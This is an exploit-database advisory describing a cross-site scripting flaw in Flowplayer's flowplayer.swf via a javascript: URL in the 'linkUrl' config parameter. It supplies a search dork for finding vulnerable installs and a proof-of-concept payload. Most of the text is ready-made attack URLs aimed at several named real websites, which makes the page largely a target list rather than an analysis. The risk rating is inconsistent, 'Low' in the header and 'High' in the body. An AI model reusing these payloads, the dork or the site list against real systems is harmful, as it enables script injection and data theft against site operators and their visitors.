Flowplayer Cross Site Scripting

2014.05.16
Credit: Muhammad Adeel aka Innoxent Stoker
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:flowplayer/flowplayer.swf

# Flowplayer (js & swf) XSS Vulnerability # Date: 15/5/14 # Vulnerablity Risk : High # Vulnerable Sofware: http://flowplayer.org/ # Dork : inurl:flowplayer/flowplayer.swf # Author: Muhammad Adeel aka Innoxent Stoker # Founder | Urdusecurity.blogspot.com # Vulnerability xss is Cross Site Scripting vuln Which actually interacts With Either WebServer or The Clients and its Highly Dangrous Vuln Because it May Lead to Data Stealing and Other Stuff Like That. # POC & Exploit xss is in flowplayer.swf Config Command Which is Executing xss while Giving "linkUrl" ParaMeter http://Vulnerablesite.com/flowplayer.swf?config={"clip":{"url":" http://stream.flowplayer.org/bauhaus/624x260.mp4", "linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf # Demo http://www.advancementprojectca.org/sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config={ "clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4", "linkUrl":"javascript:confirm(String.fromCharCode(88, 115, 115, 32, 80, 111, 99, 32, 47, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 65, 100, 101, 101, 108, 32, 97, 107, 97, 32, 73, 110, 110, 111, 120, 101, 110, 116, 32, 83, 116, 111, 107, 101, 114, 32, 47, 47, 32, 85, 114, 100, 117, 83, 101, 99));"}}&.swf http://www.dancelessonsaustin.com/template/fredwoodlands/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf http://www.tier1personnel.com/template/default/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf https://housing.wwu.edu/include/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top